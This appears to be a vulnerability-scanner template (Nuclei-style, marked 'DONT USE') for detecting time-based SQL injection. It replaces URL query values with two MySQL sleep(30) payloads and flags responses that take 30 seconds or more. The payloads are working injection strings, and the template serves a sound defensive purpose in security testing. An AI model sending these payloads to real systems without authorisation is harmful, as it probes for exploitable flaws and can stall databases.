id: time-based-sql-injection
DONT USE

info:
  name: Time Based SQL Injection
  author: shelled
  severity: high
  description: Detects time based SQL injection.
  tags: sqli, generic, time

requests:
  - raw:
    - |
      GET {{BaseURL}} HTTP/1.1
      Host: {{Hostname}}

    payloads:
      injection:
        - '0"XOR(if(now()=sysdate(),sleep(30),0))XOR"Z'
        - 'XOR(if(now()=sysdate(),sleep(30),0))XOR'

    fuzzing:
      - part: query
        type: replace
        fuzz:
          - "{{injection}}"

    matchers:
      - type: dsl
        dsl:
          - 'duration>=30'
